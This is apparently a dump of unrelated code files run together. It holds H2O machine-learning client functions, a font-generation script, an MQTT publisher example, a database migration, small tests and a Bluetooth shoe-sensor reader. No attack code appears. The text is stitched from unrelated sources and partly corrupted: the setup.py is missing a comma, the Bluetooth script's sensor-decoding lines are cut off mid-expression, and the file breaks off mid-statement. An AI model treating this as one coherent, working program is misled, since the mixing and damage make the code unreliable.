:param force: logical, indicates how to deal with files that already exist :return: the path of the model (string) """ if not isinstance(dir, str): raise ValueError("`dir` must be a character string") if dir == "": dir = os.getcwd() if not isinstance(name, str): raise ValueError("`name` must be a character string") if name == "": name = model._model_json['model_id']['name'] if not isinstance(filename, str): raise ValueError("`filename` must be a character string") if not isinstance(force, bool): raise ValueError("`force` must be True or False") path = filename if filename != "" else os.path.join(dir, name) kwargs = dict([("dir",path), ("force",int(force)), ("_rest_version", 99)]) H2OConnection.get("Models.bin/"+model._model_json['model_id']['name'], **kwargs) return path def load_model(path): """ Load a saved H2O model from disk. :param path: The full path of the H2O Model to be imported. For example, if the `dir` argument in h2o.saveModel was set to "/Users/UserName/Desktop" then the `path` argument in h2o.loadModel should be set to something like "/Users/UserName/Desktop/K-meansModel__a7cebf318ca5827185e209edf47c4052" :return: the model """ if not isinstance(path, str): raise ValueError("`path` must be a non-empty character string") kwargs = dict([("dir",path), ("_rest_version", 99)]) res = H2OConnection.post("Models.bin/", **kwargs) return get_model(res.json()['models'][0]['model_id']['name']) def cluster_status(): """ TODO: This isn't really a cluster status... it's a node status check for the node we're connected to. This is possibly confusing because this can come back without warning, but if a user tries to do any remoteSend, they will get a "cloud sick warning" Retrieve information on the status of the cluster running H2O. :return: None """ cluster_json = H2OConnection.get_json("Cloud?skip_ticks=true") print "Version: {0}".format(cluster_json['version']) print "Cloud name: {0}".format(cluster_json['cloud_name']) print "Cloud size: {0}".format(cluster_json['cloud_size']) if cluster_json['locked']: print "Cloud is locked\n" else: print "Accepting new members\n" if cluster_json['nodes'] == None or len(cluster_json['nodes']) == 0: print "No nodes found" return status = [] for node in cluster_json['nodes']: for k, v in zip(node.keys(),node.values()): if k in ["h2o", "healthy", "last_ping", "num_cpus", "sys_load", "mem_value_size", "total_value_size", "free_mem", "tot_mem", "max_mem", "free_disk", "max_disk", "pid", "num_keys", "tcps_active", "open_fds", "rpcs_active"]: status.append(k+": {0}".format(v)) print ', '.join(status) print def init(ip="localhost", port=54321, size=1, start_h2o=False, enable_assertions=False, license=None, max_mem_size_GB=None, min_mem_size_GB=None, ice_root=None, strict_version_check=False): """ Initiate an H2O connection to the specified ip and port. :param ip: An IP address, default is "localhost" :param port: A port, default is 54321 :param size: THe expected number of h2o instances (ignored if start_h2o is True) :param start_h2o: A boolean dictating whether this module should start the H2O jvm. An attempt is made anyways if _connect fails. :param enable_assertions: If start_h2o, pass `-ea` as a VM option.s :param license: If not None, is a path to a license file. :param max_mem_size_GB: Maximum heap size (jvm option Xmx) in gigabytes. :param min_mem_size_GB: Minimum heap size (jvm option Xms) in gigabytes. :param ice_root: A temporary directory (default location is determined by tempfile.mkdtemp()) to hold H2O log files. 
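:param strict_version_check: If True, fail when the version of this client package does not match the version reported by the H2O server (the check itself is performed by H2OConnection).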
:return: None """ H2OConnection(ip=ip, port=port,start_h2o=start_h2o,enable_assertions=enable_assertions,license=license,max_mem_size_GB=max_mem_size_GB,min_mem_size_GB=min_mem_size_GB,ice_root=ice_root,strict_version_check=strict_version_check) return None def export_file(frame,path,force=False): """ Export a given H2OFrame to a path on the machine this python session is currently connected to. To view the current session, call h2o.cluster_info(). :param frame: The Frame to save to disk. :param path: The path to the save point on disk. :param force: Overwrite any preexisting file with the same path :return: None """ H2OJob(H2OConnection.post_json("Frames/"+frame._id+"/export/"+path+"/overwrite/"+("true" if force else "false")), "Export File").poll() def cluster_info(): """ Display the current H2O cluster information. :return: None """ H2OConnection._cluster_info() def shutdown(conn=None, prompt=True): """ Shut down the specified instance. All data will be lost. This method checks if H2O is running at the specified IP address and port, and if it is, shuts down that H2O instance. :param conn: An H2OConnection object containing the IP address and port of the server running H2O. :param prompt: A logical value indicating whether to prompt the user before shutting down the H2O server. :return: None """ if conn == None: conn = H2OConnection.current_connection() H2OConnection._shutdown(conn=conn, prompt=prompt) def deeplearning(x,y=None,validation_x=None,validation_y=None,**kwargs): """ Build a supervised Deep Learning model (kwargs are the same arguments that you can find in FLOW) :return: Return a new classifier or regression model. """ return h2o_model_builder.supervised_model_build(x,y,validation_x,validation_y,"deeplearning",kwargs) def autoencoder(x,**kwargs): """ Build an Autoencoder :param x: Columns with which to build an autoencoder :param kwargs: Additional arguments to pass to the autoencoder. :return: A new autoencoder model """ return h2o_model_builder.unsupervised_model_build(x,None,"autoencoder",kwargs) def gbm(x,y,validation_x=None,validation_y=None,**kwargs): """ Build a Gradient Boosted Method model (kwargs are the same arguments that you can find in FLOW) :return: A new classifier or regression model. """ return h2o_model_builder.supervised_model_build(x,y,validation_x,validation_y,"gbm",kwargs) def glm(x,y,validation_x=None,validation_y=None,**kwargs): """ Build a Generalized Linear Model (kwargs are the same arguments that you can find in FLOW) :return: A new regression or binomial classifier. """ kwargs = dict([(k, kwargs[k]) if k != "Lambda" else ("lambda", kwargs[k]) for k in kwargs]) return h2o_model_builder.supervised_model_build(x,y,validation_x,validation_y,"glm",kwargs) def start_glm_job(x,y,validation_x=None,validation_y=None,**kwargs): """ Build a Generalized Linear Model (kwargs are the same arguments that you can find in FLOW). Note: this function is the same as glm(), but it doesn't block on model-build. Instead, it returns and H2OModelFuture object immediately. The model can be retrieved from the H2OModelFuture object with get_future_model(). 
:return: H2OModelFuture """ kwargs["do_future"] = True return glm(x,y,validation_x,validation_y,**kwargs) def kmeans(x,validation_x=None,**kwargs): """ Build a KMeans model (kwargs are the same arguments that you can find in FLOW) :return: A new clustering model """ return h2o_model_builder.unsupervised_model_build(x,validation_x,"kmeans",kwargs) def random_forest(x,y,validation_x=None,validation_y=None,**kwargs): """ Build a Random Forest Model (kwargs are the same arguments that you can find in FLOW) :return: A new classifier or regression model. """ return h2o_model_builder.supervised_model_build(x,y,validation_x,validation_y,"drf",kwargs) def prcomp(x,validation_x=None,**kwargs): """ Principal components analysis of a H2O dataset using the power method to calculate the singular value decomposition of the Gram matrix. :param k: The number of principal components to be computed. This must be between 1 and min(ncol(training_frame), nrow(training_frame)) inclusive. :param model_id: (Optional) The unique hex key assigned to the resulting model. Automatically generated if none is provided. :param max_iterations: The maximum number of iterations to run each power iteration loop. Must be between 1 and 1e6 inclusive. :param transform: A character string that indicates how the training data should be transformed before running PCA. Possible values are "NONE": for no transformation, "DEMEAN": for subtracting the mean of each column, "DESCALE": for dividing by the standard deviation of each column, "STANDARDIZE": for demeaning and descaling, and "NORMALIZE": for demeaning and dividing each column by its range (max - min). :param seed: (Optional) Random seed used to initialize the right singular vectors at the beginning of each power method iteration. :param use_all_factor_levels: (Optional) A logical value indicating whether all factor levels should be included in each categorical column expansion. If FALSE, the indicator column corresponding to the first factor level of every categorical variable will be dropped. Defaults to FALSE. :return: a new dim reduction model """ return h2o_model_builder.unsupervised_model_build(x,validation_x,"pca",kwargs) def svd(x,validation_x=None,**kwargs): """ Singular value decomposition of a H2O dataset using the power method. :param nv: The number of right singular vectors to be computed. This must be between 1 and min(ncol(training_frame), nrow(training_frame)) inclusive. :param max_iterations: The maximum number of iterations to run each power iteration loop. Must be between 1 and 1e6 inclusive.max_iterations The maximum number of iterations to run each power iteration loop. Must be between 1 and 1e6 inclusive. :param transform: A character string that indicates how the training data should be transformed before running PCA. Possible values are "NONE": for no transformation, "DEMEAN": for subtracting the mean of each column, "DESCALE": for dividing by the standard deviation of each column, "STANDARDIZE": for demeaning and descaling, and "NORMALIZE": for demeaning and dividing each column by its range (max - min). :param seed: (Optional) Random seed used to initialize the right singular vectors at the beginning of each power method iteration. :param use_all_factor_levels: (Optional) A logical value indicating whether all factor levels should be included in each categorical column expansion. If FALSE, the indicator column corresponding to the first factor level of every categorical variable will be dropped. Defaults to TRUE. 
:return: a new dim reduction model """ kwargs['_rest_version'] = 99 return h2o_model_builder.unsupervised_model_build(x,validation_x,"svd",kwargs) def naive_bayes(x,y,validation_x=None,validation_y=None,**kwargs): """ The naive Bayes classifier assumes independence between predictor variables conditional on the response, and a Gaussian distribution of numeric predictors with mean and standard deviation computed from the training dataset. When building a naive Bayes classifier, every row in the training dataset that contains at least one NA will be skipped completely. If the test dataset has missing values, then those predictors are omitted in the probability calculation during prediction. :param laplace: A positive number controlling Laplace smoothing. The default zero disables smoothing. :param threshold: The minimum standard deviation to use for observations without enough data. Must be at least 1e-10. :param eps: A threshold cutoff to deal with numeric instability, must be positive. :param compute_metrics: A logical value indicating whether model metrics should be computed. Set to FALSE to reduce the runtime of the algorithm. :return: Returns an H2OBinomialModel if the response has two categorical levels, H2OMultinomialModel otherwise. """ return h2o_model_builder.supervised_model_build(x,y,validation_x,validation_y,"naivebayes",kwargs) def create_frame(id = None, rows = 10000, cols = 10, randomize = True, value = 0, real_range = 100, categorical_fraction = 0.2, factors = 100, integer_fraction = 0.2, integer_range = 100, binary_fraction = 0.1, binary_ones_fraction = 0.02, missing_fraction = 0.01, response_factors = 2, has_response = False, seed=None): """ Data Frame Creation in H2O. Creates a data frame in H2O with real-valued, categorical, integer, and binary columns specified by the user. :param id: A string indicating the destination key. If empty, this will be auto-generated by H2O. :param rows: The number of rows of data to generate. :param cols: The number of columns of data to generate. Excludes the response column if has_response == True}. :param randomize: A logical value indicating whether data values should be randomly generated. This must be TRUE if either categorical_fraction or integer_fraction is non-zero. :param value: If randomize == FALSE, then all real-valued entries will be set to this value. :param real_range: The range of randomly generated real values. :param categorical_fraction: The fraction of total columns that are categorical. :param factors: The number of (unique) factor levels in each categorical column. :param integer_fraction: The fraction of total columns that are integer-valued. :param integer_range: The range of randomly generated integer values. :param binary_fraction: The fraction of total columns that are binary-valued. :param binary_ones_fraction: The fraction of values in a binary column that are set to 1. :param missing_fraction: The fraction of total entries in the data frame that are set to NA. :param response_factors: If has_response == TRUE, then this is the number of factor levels in the response column. :param has_response: A logical value indicating whether an additional response column should be pre-pended to the final H2O data frame. If set to TRUE, the total number of columns will be cols+1. :param seed: A seed used to generate random values when randomize = TRUE. 
:return: the H2OFrame that was created """ parms = {"dest": _py_tmp_key() if id is None else id, "rows": rows, "cols": cols, "randomize": randomize, "value": value, "real_range": real_range, "categorical_fraction": categorical_fraction, "factors": factors, "integer_fraction": integer_fraction, "integer_range": integer_range, "binary_fraction": binary_fraction, "binary_ones_fraction": binary_ones_fraction, "missing_fraction": missing_fraction, "response_factors": response_factors, "has_response": has_response, "seed": -1 if seed is None else seed, } H2OJob(H2OConnection.post_json("CreateFrame", **parms), "Create Frame").poll() return get_frame(parms["dest"]) def interaction(data, factors, pairwise, max_factors, min_occurrence, destination_frame=None): """ Categorical Interaction Feature Creation in H2O. Creates a frame in H2O with n-th order interaction features between categorical columns, as specified by the user. :param data: the H2OFrame that holds the target categorical columns. :param factors: factors Factor columns (either indices or column names). :param pairwise: Whether to create pairwise interactions between factors (otherwise create one higher-order interaction). Only applicable if there are 3 or more factors. :param max_factors: Max. number of factor levels in pair-wise interaction terms (if enforced, one extra catch-all factor will be made) :param min_occurrence: Min. occurrence threshold for factor levels in pair-wise interaction terms :param destination_frame: A string indicating the destination key. If empty, this will be auto-generated by H2O. :return: H2OFrame """ data._eager() factors = [data.names()[n] if isinstance(n,int) else n for n in factors] parms = {"dest": _py_tmp_key() if destination_frame is None else destination_frame, "source_frame": data._id, "factor_columns": [_quoted(f) for f in factors], "pairwise": pairwise, "max_factors": max_factors, "min_occurrence": min_occurrence, } H2OJob(H2OConnection.post_json("Interaction", **parms), "Interactions").poll() return get_frame(parms["dest"]) def network_test(): res = H2OConnection.get_json(url_suffix="NetworkTest") res["table"].show() def locate(path): """ Search for a relative path and turn it into an absolute path. This is handy when hunting for data files to be passed into h2o and used by import file. Note: This function is for unit testing purposes only. :param path: Path to search for :return: Absolute path if it is found. None otherwise. """ tmp_dir = os.path.realpath(os.getcwd()) possible_result = os.path.join(tmp_dir, path) while (True): if (os.path.exists(possible_result)): return possible_result next_tmp_dir = os.path.dirname(tmp_dir) if (next_tmp_dir == tmp_dir): raise ValueError("File not found: " + path) tmp_dir = next_tmp_dir possible_result = os.path.join(tmp_dir, path) def store_size(): """ Get the H2O store size (current count of keys). :return: number of keys in H2O cloud """ return rapids("(store_size)")["result"] def keys_leaked(num_keys): """ Ask H2O if any keys leaked. @param num_keys: The number of keys that should be there. :return: A boolean True/False if keys leaked. If keys leaked, check H2O logs for further detail. """ return rapids("keys_leaked #{})".format(num_keys))["result"]=="TRUE" def as_list(data, use_pandas=True): """ Convert an H2O data object into a python-specific object. WARNING: This will pull all data local! If Pandas is available (and use_pandas is True), then pandas will be used to parse the data frame. 
Otherwise, a list-of-lists populated by character data will be returned (so the types of data will all be str). :param data: An H2O data object. :param use_pandas: Try to use pandas for reading in the data. :return: List of list (Rows x Columns). """ return H2OFrame.as_data_frame(data, use_pandas) def set_timezone(tz): """ Set the Time Zone on the H2O Cloud :param tz: The desired timezone. :return: None """ rapids(ExprNode("setTimeZone", tz)._eager()) def get_timezone(): """ Get the Time Zone on the H2O Cloud :return: the time zone (string) """ return H2OFrame(expr=ExprNode("getTimeZone"))._scalar() def list_timezones(): """ Get a list of all the timezones :return: the time zones (as an H2OFrame) """ return H2OFrame(expr=ExprNode("listTimeZones"))._frame() class H2ODisplay: """ Pretty printing for H2O Objects; Handles both IPython and vanilla console display """ THOUSANDS = "{:,}" def __init__(self,table=None,header=None,table_header=None,**kwargs): self.table_header=table_header self.header=header self.table=table self.kwargs=kwargs self.do_print=True # one-shot display... never return an H2ODisplay object (or try not to) # if holding onto a display object, then may have odd printing behavior # the __repr__ and _repr_html_ methods will try to save you from many prints, # but just be WARNED that your mileage may vary! # # In other words, it's better to just new one of these when you're ready to print out. if self.table_header is not None: print print self.table_header + ":" print if H2ODisplay._in_ipy(): from IPython.display import display display(self) self.do_print=False else: self.pprint() self.do_print=False # for Ipython def _repr_html_(self): if self.do_print: return H2ODisplay._html_table(self.table,self.header) def pprint(self): r = self.__repr__() print r # for python REPL console def __repr__(self): if self.do_print or not H2ODisplay._in_ipy(): if self.header is None: return tabulate.tabulate(self.table,**self.kwargs) else: return tabulate.tabulate(self.table,headers=self.header,**self.kwargs) self.do_print=True return "" @staticmethod def _in_ipy(): # are we in ipy? then pretty print tables with _repr_html try: __IPYTHON__ return True except NameError: return False # some html table builder helper things @staticmethod def _html_table(rows, header=None): table= "
<div style="overflow:auto"><table>{}</table></div>
" # keep table in a div for scroll-a-bility table_rows=[] if header is not None: table_rows.append(H2ODisplay._html_row(header)) for row in rows: table_rows.append(H2ODisplay._html_row(row)) return table.format("\n".join(table_rows)) @staticmethod def _html_row(row): res = "{}" entry = "{}" entries = "\n".join([entry.format(str(r)) for r in row]) return res.format(entries) def can_use_pandas(): try: imp.find_module('pandas') return True except ImportError: return False #!/usr/bin/env python2 # -*- coding: utf-8 -*- """ Generates the Comic Mono font files based on Comic Shanns font. Required files: - vendor/comic-shanns.otf - vendor/Cousine-Regular.ttf Based on: - monospacifier: https://github.com/cpitclaudel/monospacifier/blob/master/monospacifier.py - YosemiteAndElCapitanSystemFontPatcher: https://github.com/dtinth/YosemiteAndElCapitanSystemFontPatcher/blob/master/bin/patch """ import os import re import sys import fontforge import psMat import unicodedata def height(font): return float(font.capHeight) def adjust_height(source, template, scale): source.selection.all() source.transform(psMat.scale(height(template) / height(source))) for attr in ['ascent', 'descent', 'hhea_ascent', 'hhea_ascent_add', 'hhea_linegap', 'hhea_descent', 'hhea_descent_add', 'os2_winascent', 'os2_winascent_add', 'os2_windescent', 'os2_windescent_add', 'os2_typoascent', 'os2_typoascent_add', 'os2_typodescent', 'os2_typodescent_add', ]: setattr(source, attr, getattr(template, attr)) source.transform(psMat.scale(scale)) font = fontforge.open('comic-shanns-norwegian.sfd') ref = fontforge.open('vendor/Cousine-Regular.ttf') for g in font.glyphs(): uni = g.unicode category = unicodedata.category(chr(uni)) if 0 <= uni <= sys.maxunicode else None if g.width > 0 and category not in ['Mn', 'Mc', 'Me']: target_width = 510 if g.width != target_width: delta = target_width - g.width g.left_side_bearing += delta / 2 g.right_side_bearing += delta - g.left_side_bearing g.width = target_width font.familyname = 'Comic Mononorsk' font.version = '1.0' font.comment = 'https://github.com/dtinth/comic-mono-font' font.copyright = 'https://github.com/dtinth/comic-mono-font/blob/master/LICENSE' adjust_height(font, ref, 1.075) font.sfnt_names = [] # Get rid of 'Prefered Name' etc. font.fontname = 'ComicMononorsk' font.fullname = 'Comic Mononorsk' font.generate('ComicMononorsk.ttf') font.selection.all() font.fontname = 'ComicMononorsk-Bold' font.fullname = '' font.weight = 'Bold' font.changeWeight(32, "LCG", 0, 0, "squish") font.generate('ComicMononorsk-Bold.ttf') cypherdotXd/o3de # coding:utf-8 #!/usr/bin/python # # Copyright (c) Contributors to the Open 3D Engine Project. # For complete copyright and license terms please see the LICENSE at the root of this distribution. 
# # SPDX-License-Identifier: Apache-2.0 OR MIT # # # -- This line is 75 characters ------------------------------------------- """azpy.shared.__init__""" import os from azpy.env_bool import env_bool from azpy.constants import ENVAR_DCCSI_GDEBUG from azpy.constants import ENVAR_DCCSI_DEV_MODE # global space _G_DEBUG = env_bool(ENVAR_DCCSI_GDEBUG, False) _DCCSI_DEV_MODE = env_bool(ENVAR_DCCSI_DEV_MODE, False) _PACKAGENAME = __name__ if _PACKAGENAME is '__main__': _PACKAGENAME = 'azpy.shared' import azpy _LOGGER = azpy.initialize_logger(_PACKAGENAME) _LOGGER.debug('Invoking __init__.py for {0}.'.format({_PACKAGENAME})) # ------------------------------------------------------------------------- __all__ = ['common', 'ui'] # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- if _DCCSI_DEV_MODE: # If in dev mode this will test imports of __all__ from azpy import test_imports _LOGGER.debug('Testing Imports from {0}'.format(_PACKAGENAME)) test_imports(__all__, _pkg=_PACKAGENAME, _logger=_LOGGER) # ------------------------------------------------------------------------- del _LOGGER tests/test_makePDF.py import pytest from unittest import TestCase from PIL import Image import sys, os, shutil, uuid myPath = os.path.dirname(os.path.abspath(__file__)) sys.path.insert(0, myPath + "/../src/makePDF/") # move to the src directory import main class TestMakePDF(TestCase): def test_make_pdf_wrong_file(self): with pytest.raises(IOError) as e_info: main.make_pdf_from_images(["/not/here.png"], "foo.pdf") assert e_info == "Something went wrong, I can't access the file at /not/here.png" def test_make_pdf(self): main.make_pdf_from_images( ['tests/images/travis-pride.png', 'tests/images/travis-pride-sans-alpha.png'], output = "out.pdf" )ultrafive/riscv-pvp1-10 from ...isa.inst import * class Rem(Inst): name = 'rem' def golden(self): if self['rs2'] == 0: return self['rs1'] else: d = int( self['rs1'] / self['rs2'] ) return self['rs1'] - d * self['rs2']class Solution: def numberOfWays(self, s: str) -> int: temp = [] c0 = 0 c1 = 0 for char in s : if char == "0" : c0+=1 else: c1+=1 temp.append([c0,c1]) total0 = c0 total1 = c1 count = 0 for i in range(1, len(s)-1) : if s[i] == "0" : m1 = temp[i-1][1] m2 = total1 - temp[i][1] count += m1*m2 else: m1 = temp[i-1][0] m2 = total0 - temp[i][0] count += m1*m2 return count { "targets": [ { "target_name": "example", "sources": [ "src/main.cpp" ], "libraries": [ "../target/debug/libint_add.a" ] } ] } #!/usr/bin/python # -*- coding: utf-8 -*- # Copyright (c) 2017 <> # # All rights reserved. This program and the accompanying materials # are made available under the terms of the Eclipse Distribution License v1.0 # which accompanies this distribution. # # The Eclipse Distribution License is available at # http://www.eclipse.org/org/documents/edl-v10.php. # # All rights reserved. 
# This shows a example of an MQTT publisher with the ability to use # user name, password CA certificates based on command line arguments import paho.mqtt.client as mqtt import os import ssl import argparse import time parser = argparse.ArgumentParser() parser.add_argument('-H', '--host', required=False, default="mqtt.eclipseprojects.io") parser.add_argument('-t', '--topic', required=False, default="paho/test/opts") parser.add_argument('-q', '--qos', required=False, type=int,default=0) parser.add_argument('-c', '--clientid', required=False, default=None) parser.add_argument('-u', '--username', required=False, default=None) parser.add_argument('-d', '--disable-clean-session', action='store_true', help="disable 'clean session' (sub + msgs not cleared when client disconnects)") parser.add_argument('-p', '--password', required=False, default=None) parser.add_argument('-P', '--port', required=False, type=int, default=None, help='Defaults to 8883 for TLS or 1883 for non-TLS') parser.add_argument('-N', '--nummsgs', required=False, type=int, default=1, help='send this many messages before disconnecting') parser.add_argument('-S', '--delay', required=False, type=float, default=1, help='number of seconds to sleep between msgs') parser.add_argument('-k', '--keepalive', required=False, type=int, default=60) parser.add_argument('-s', '--use-tls', action='store_true') parser.add_argument('--insecure', action='store_true') parser.add_argument('-F', '--cacerts', required=False, default=None) parser.add_argument('--tls-version', required=False, default=None, help='TLS protocol version, can be one of tlsv1.2 tlsv1.1 or tlsv1\n') parser.add_argument('-D', '--debug', action='store_true') args, unknown = parser.parse_known_args() def on_connect(mqttc, obj, flags, rc): print("connect rc: " + str(rc)) def on_message(mqttc, obj, msg): print(msg.topic + " " + str(msg.qos) + " " + str(msg.payload)) def on_publish(mqttc, obj, mid): print("mid: " + str(mid)) def on_subscribe(mqttc, obj, mid, granted_qos): print("Subscribed: " + str(mid) + " " + str(granted_qos)) def on_log(mqttc, obj, level, string): print(string) usetls = args.use_tls if args.cacerts: usetls = True port = args.port if port is None: if usetls: port = 8883 else: port = 1883 mqttc = mqtt.Client(args.clientid,clean_session = not args.disable_clean_session) if usetls: if args.tls_version == "tlsv1.2": tlsVersion = ssl.PROTOCOL_TLSv1_2 elif args.tls_version == "tlsv1.1": tlsVersion = ssl.PROTOCOL_TLSv1_1 elif args.tls_version == "tlsv1": tlsVersion = ssl.PROTOCOL_TLSv1 elif args.tls_version is None: tlsVersion = None else: print ("Unknown TLS version - ignoring") tlsVersion = None if not args.insecure: cert_required = ssl.CERT_REQUIRED else: cert_required = ssl.CERT_NONE mqttc.tls_set(ca_certs=args.cacerts, certfile=None, keyfile=None, cert_reqs=cert_required, tls_version=tlsVersion) if args.insecure: mqttc.tls_insecure_set(True) if args.username or args.password: mqttc.username_pw_set(args.username, args.password) mqttc.on_message = on_message mqttc.on_connect = on_connect mqttc.on_publish = on_publish mqttc.on_subscribe = on_subscribe if args.debug: mqttc.on_log = on_log print("Connecting to "+args.host+" port: "+str(port)) mqttc.connect(args.host, port, args.keepalive) mqttc.loop_start() for x in range (0, args.nummsgs): msg_txt = '{"msgnum": "'+str(x)+'"}' print("Publishing: "+msg_txt) infot = mqttc.publish(args.topic, msg_txt, qos=args.qos) infot.wait_for_publish() time.sleep(args.delay) mqttc.disconnect() RhinosF1/QuIRC from distutils.core import 
setup setup( name = "QuIRC", py_modules = ["QuIRC"], version = "BetaV1.1", description = "Quick auto-logging IRC Bot", author = "RhinosF1 & Sario528", author_email = "" download_url = "", keywords = ["irc"] ) src/migrations/versions/8ac607623072_.py1-10 """empty message Revision ID: 8ac607623072 Revises: 1b68633 Create Date: 2020-06-16 22:36:47.444458 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = '8ac607623072' down_revision = '1b68633c' branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.execute("COMMIT") op.execute("ALTER TYPE event ADD VALUE 'ON_MEASUREMENT_PUBLISHED';") # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.execute("COMMIT") op.execute("ALTER TYPE event DROP VALUE 'ON_MEASUREMENT_PUBLISHED';") # ### end Alembic commands ### victor-abz/saleor1000+ from django.core.management.base import BaseCommand from ...tasks import delete_event_payloads_task class Command(BaseCommand): help = ( "Delete EventPayloads and EventDelivery from database " "that are older than the value set " "in EVENT_PAYLOAD_DELETE_PERIOD environment variable." ) def handle(self, **options): delete_event_payloads_task() #!/usr/bin/env python from __future__ import print_function import argparse from importlib import reload from bluepy.btle import UUID, Peripheral, ADDR_TYPE_RANDOM, Scanner, DefaultDelegate, BTLEException from bluepy import btle import time from time import sleep import struct import binascii import sys import os import datetime import socket import pygame from pygame.locals import * device_to_advertising_data_dictionary = dict() def dump_services(dev): services = sorted(dev.services, key=lambda s: s.hndStart) for s in services: print ("\t%04x: %s" % (s.hndStart, s)) if s.hndStart == s.hndEnd: continue chars = s.getCharacteristics() for i, c in enumerate(chars): props = c.propertiesToString() h = c.getHandle() if 'READ' in props: val = c.read() if c.uuid == btle.AssignedNumbers.device_name: string = '\'' + \ val.decode('utf-8') + '\'' elif c.uuid == btle.AssignedNumbers.device_information: string = repr(val) else: string = '' else: string = '' print ("\t%04x: %-59s %-12s %s" % (h, c, props, string)) while True: h += 1 if h > s.hndEnd or (i < len(chars) - 1 and h >= chars[i + 1].getHandle() - 1): break try: val = dev.readCharacteristic(h) print ("\t%04x: <%s>" % (h, binascii.b2a_hex(val).decode('utf-8'))) except btle.BTLEException: break class ScanPrint(btle.DefaultDelegate): def __init__(self, opts): btle.DefaultDelegate.__init__(self) self.opts = opts def handleDiscovery(self, dev, isNewDev, isNewData): if isNewDev: status = "new" elif isNewData: if self.opts.new: return status = "update" else: if not self.opts.all: return status = "old" if dev.rssi < self.opts.sensitivity: return for (sdid, desc, val) in dev.getScanData(): if sdid in [8, 9]: if "boogio" in val.lower(): print (' Device (%s): %s (%s), %d dBm %s' % (status, dev.addr, dev.addrType, dev.rssi, ('' if dev.connectable else '(not connectable)')) ) for (sdid, desc, val) in dev.getScanData(): #print("desc = " + str(desc) + " val = " + str(val)) if desc == "Manufacturer": device_to_advertising_data_dictionary[str(dev.addr)] = str(val) print("device_to_advertising_data_dictionary[" + str(dev.addr) + "] = " + str(val)) if sdid in [8, 9]: print ('\t' + desc + ': \'' + val + '\'') else: print ('\t' + desc + ': <' + val + '>') class 
MyDelegate(DefaultDelegate): def __init__(self): self.MAX_FORCE_VALUE = 1023.0 self.MAX_ACCELERATION_VALUE = 8000.0 self.MAX_ROTATION_VALUE = 1000.0 self.MAX_HEADING_VALUE = 1000.0 self.MAX_SHORT_VALUE = 65535.0 self.HALF_OF_MAX_SHORT_VALUE = 32767.0 self.ACCELERATION_CONVERSION_COEFFICIENT = 1.0 / 1000.0 self.ROTATION_CONVERSION_COEFFICIENT = 1.0 / 1000.0 self.force0 = 0.00 self.force1 = 0.00 self.force2 = 0.00 self.force3 = 0.00 self.force4 = 0.00 self.force5 = 0.00 self.force6 = 0.00 self.force7 = 0.00 self.force012 = 0.00 self.force34 = 0.00 self.force567 = 0.00 self.accelerationX = 0.000 self.accelerationY = 0.000 self.accelerationZ = 0.000 self.rotationX = 0.000 self.rotationY = 0.000 self.rotationZ = 0.000 self.rotationW = 0.000 self.buffer1CharacteristicHandle = None def handleNotification(self, hnd, data): #print(data) #print("\n") #Debug print repr(data) if (hnd == self.buffer1CharacteristicHandle): self.accelerationX = struct.unpack(' self.HALF_OF_MAX_SHORT_VALUE): self.accelerationX = self.accelerationX - self.MAX_SHORT_VALUE if(self.accelerationY > self.HALF_OF_MAX_SHORT_VALUE): self.accelerationY = self.accelerationY - self.MAX_SHORT_VALUE if(self.accelerationZ > self.HALF_OF_MAX_SHORT_VALUE): self.accelerationZ = self.accelerationZ - self.MAX_SHORT_VALUE #2's complement if(self.rotationX > self.HALF_OF_MAX_SHORT_VALUE): self.rotationX = self.rotationX - self.MAX_SHORT_VALUE if(self.rotationY > self.HALF_OF_MAX_SHORT_VALUE): self.rotationY = self.rotationY - self.MAX_SHORT_VALUE if(self.rotationZ > self.HALF_OF_MAX_SHORT_VALUE): self.rotationZ = self.rotationZ - self.MAX_SHORT_VALUE if(self.rotationW > self.HALF_OF_MAX_SHORT_VALUE): self.rotationW = self.rotationW - self.MAX_SHORT_VALUE else: teptep = binascii.b2a_hex(data) print('Notification: UNKOWN: hnd {}, data {}'.format(hnd, teptep)) def _str_to_int(self, s): """ Transform hex str into int. 
""" i = int(s, 16) if i >= 2**7: i -= 2**8 return i def main(): parser = argparse.ArgumentParser() parser.add_argument('-i', '--hci', action='store', type=int, default=0, help='Interface number for scan') parser.add_argument('-t', '--timeout', action='store', type=int, default=4, help='Scan delay, 0 for continuous') parser.add_argument('-s', '--sensitivity', action='store', type=int, default=-128, help='dBm value for filtering far devices') parser.add_argument('-d', '--discover', action='store_true', help='Connect and discover service to scanned devices') parser.add_argument('-a', '--all', action='store_true', help='Display duplicate adv responses, by default show new + updated') parser.add_argument('-n', '--new', action='store_true', help='Display only new adv responses, by default show new + updated') parser.add_argument('-v', '--verbose', action='store_true', help='Increase output verbosity') parser.add_argument('-b', '--bpx', action='store', help='connect to device with this address') parser.add_argument('-p', '--port', action='store', help='relay all readings over this TCP port') parser.add_argument('-e', '--headless', action='store_true', help='run without graphics (improves performance)') arg = parser.parse_args(sys.argv[1:]) #print("arg = " + str(arg)) if arg.bpx != None: print("arg.bpx = " + str(arg.bpx)) PERIPHERAL_UUID = str(arg.bpx) else: PERIPHERAL_UUID = "dc:80:07:ef:8b:cf" #PERIPHERAL_UUID = "f5:47:18:cf:9c:dc" #print("pass the hardware address to this script to connect to that device") #print("usage: -b ") #print("You can find the hardware address by running scanner.py") #return if arg.port != None: TRANSMISSION_PORT = int(arg.port) print("arg.port = " + str(arg.port)) print("TRANSMISSION_PORT = " + str(TRANSMISSION_PORT)) else: TRANSMISSION_PORT = -1 if arg.headless != None: headless = True else: headless = False btle.Debugging = arg.verbose scanner = btle.Scanner(arg.hci).withDelegate(ScanPrint(arg)) print ("Scanning for devices...") devices = scanner.scan(arg.timeout) if arg.discover: print ("Discovering services...") for d in devices: if not d.connectable: continue print (" Connecting to", d.addr + ":") dev = btle.Peripheral(d) dump_services(dev) dev.disconnect() print boogioPeripheral = Peripheral(PERIPHERAL_UUID, "random") boogioDelegate = MyDelegate() boogioPeripheral.setDelegate(boogioDelegate) boogioShoeSensorService = None buffer1Characteristic = None CCCD_UUID = 0x2902 device_is_left_shoe = False device_is_right_shoe = False if device_to_advertising_data_dictionary[str(PERIPHERAL_UUID)] == "ffff05": device_is_right_shoe = True print("Device is Right Shoe") elif device_to_advertising_data_dictionary[str(PERIPHERAL_UUID)] == 